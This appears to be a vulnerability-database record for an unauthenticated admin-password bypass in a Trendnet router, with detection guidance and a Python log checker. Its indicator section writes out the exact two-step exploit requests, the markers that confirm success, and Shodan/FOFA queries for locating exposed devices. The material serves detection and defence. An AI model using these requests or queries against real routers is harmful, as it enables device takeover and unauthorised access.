CVE-2021-20158
published 2021-12-30


Priority: P274, critical, 9.8 (CVSS 3.1)
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
EXPLOIT
EPSS: 10.77% (95.3th percentile)
Trendnet AC2600 TEW-827DRU version 2.08B01 contains an authentication bypass vulnerability. It is possible for an unauthenticated, malicious actor to force the change of the admin password due to a hidden administrative command.

Affected

1 range
Vendor: trendnet; Product: tew-827dru_firmware; Version range: (not given); Fixed in: (not given)

Detection & IOCs (extracted from sources)

url: /apply_sec.cgi
command: ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password={{password}}
command: html_response_page=%2Flogin_pic.asp&login_name=YWRtaW4%3D&log_pass={{base64(password)}}&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=
other: http.html:"TEW-827DRU"
other: http.html:"tew-827dru"
  • Detect exploit attempts by monitoring POST requests to /apply_sec.cgi containing the hidden action parameter 'tools_admin_elecom', which is the hidden administrative command used to bypass authentication and change the admin password.
  • A successful exploitation results in a 200 OK HTML response body containing all of: 'setConnectDevice', 'setInternet', 'setWlanSSID', and 'TEW-827DRU'; use these as confirmation indicators after the password-change POST.
  • The attack is two-stage: first POST to /apply_sec.cgi with action=tools_admin_elecom to set a new password unauthenticated, then POST again to /apply_sec.cgi with action=do_graph_auth using the newly set base64-encoded password to confirm login — both requests require no prior session.
  • Identify exposed Trendnet TEW-827DRU devices via Shodan query http.html:"TEW-827DRU" or FOFA query body="tew-827dru" to enumerate attack surface.
  • The vulnerability is specific to firmware version 2.08B01 of the Trendnet TEW-827DRU (CPE: cpe:2.3:o:trendnet:tew-827dru_firmware:2.08b01). Detection rules should be scoped to this firmware version to avoid false positives on patched devices.
  • The exploit requires no authentication (PR:N, UI:N per CVSS), meaning any unauthenticated network request to /apply_sec.cgi with action=tools_admin_elecom is inherently suspicious and should be alerted on regardless of source IP.
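The monitoring described in the bullets above, as an added example that is not part of this record and not vendor or NVD tooling: a small Python checker that scans a constructed JSON-lines proxy/WAF log for POSTs to /apply_sec.cgi carrying action=tools_admin_elecom, pairs a follow-up do_graph_auth login from the same source into a two-stage chain, and uses the four response markers listed above to mark a stage-1 request as confirmed. The log format, its field names, the source addresses, the benign action name and the five-minute pairing window are all assumptions made for the example.

```python
import json
from datetime import datetime, timedelta
from urllib.parse import parse_qs

# Indicators taken from the record above.
TARGET_PATH = "/apply_sec.cgi"
HIDDEN_ACTION = "tools_admin_elecom"   # hidden admin command (stage 1)
LOGIN_ACTION = "do_graph_auth"         # login with the newly set password (stage 2)
SUCCESS_MARKERS = ("setConnectDevice", "setInternet", "setWlanSSID", "TEW-827DRU")
CHAIN_WINDOW = timedelta(minutes=5)    # assumed: how close stage 2 must follow stage 1

# Constructed sample log (JSON lines, assumed proxy/WAF format, not a real device log).
# Passwords are replaced by placeholders; "example_benign_action" is a made-up action.
SAMPLE_LOG = r"""
{"ts": "2024-01-01T10:00:00Z", "src": "203.0.113.5", "method": "POST", "path": "/apply_sec.cgi", "body": "ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password=REDACTED", "status": 200, "resp": "<html>setConnectDevice setInternet setWlanSSID TEW-827DRU</html>"}
{"ts": "2024-01-01T10:00:02Z", "src": "203.0.113.5", "method": "POST", "path": "/apply_sec.cgi", "body": "html_response_page=%2Flogin_pic.asp&login_name=YWRtaW4%3D&log_pass=UkVEQUNURUQ%3D&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=", "status": 200, "resp": "<html>...</html>"}
{"ts": "2024-01-01T10:05:00Z", "src": "198.51.100.7", "method": "POST", "path": "/apply_sec.cgi", "body": "ccp_act=set&action=example_benign_action&method=tools", "status": 200, "resp": "<html>ok</html>"}
{"ts": "2024-01-01T10:06:00Z", "src": "198.51.100.9", "method": "GET", "path": "/login_pic.asp", "body": "", "status": 200, "resp": "<html>login</html>"}
"""


def parse_records(text):
    """Parse JSON-lines log text into a list of dicts, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def request_action(rec):
    """Return the 'action' parameter of a POST to /apply_sec.cgi, else None."""
    if rec.get("method") != "POST" or rec.get("path") != TARGET_PATH:
        return None
    params = parse_qs(rec.get("body", ""), keep_blank_values=True)
    return params.get("action", [None])[0]


def success_confirmed(rec):
    """True when the response carries all four markers of a successful password change."""
    body = rec.get("resp", "")
    return rec.get("status") == 200 and all(m in body for m in SUCCESS_MARKERS)


def find_alerts(records):
    """Alert on every hidden-command POST, and escalate when the same source
    follows it with a do_graph_auth login inside CHAIN_WINDOW."""
    alerts = []
    last_stage1 = {}  # src -> timestamp of its most recent hidden-command request
    for rec in records:
        action = request_action(rec)
        if action not in (HIDDEN_ACTION, LOGIN_ACTION):
            continue
        ts = datetime.fromisoformat(rec["ts"].replace("Z", "+00:00"))
        src = rec.get("src")
        if action == HIDDEN_ACTION:
            # Any unauthenticated request with this action is suspicious on its own.
            last_stage1[src] = ts
            alerts.append({
                "src": src, "ts": rec["ts"], "stage": 1, "severity": "high",
                "confirmed": success_confirmed(rec),
                "reason": f"POST {TARGET_PATH} with action={HIDDEN_ACTION}",
            })
        elif src in last_stage1 and ts - last_stage1[src] <= CHAIN_WINDOW:
            # Login right after the password change: the full two-stage chain.
            alerts.append({
                "src": src, "ts": rec["ts"], "stage": 2, "severity": "critical",
                "confirmed": True,
                "reason": f"{LOGIN_ACTION} within {CHAIN_WINDOW} of {HIDDEN_ACTION}",
            })
    return alerts


if __name__ == "__main__":
    for alert in find_alerts(parse_records(SAMPLE_LOG)):
        print(json.dumps(alert))
```

A plain do_graph_auth POST with no preceding hidden-command request from that source is left alone, since that is what a normal login looks like; only the tools_admin_elecom action is alerted on by itself, as the record recommends.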

CVSS provenance

NVD, CVSS v3.1: 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD, CVSS v2.0: 7.5 HIGH, AV:N/AC:L/Au:N/C:P/I:P/A:P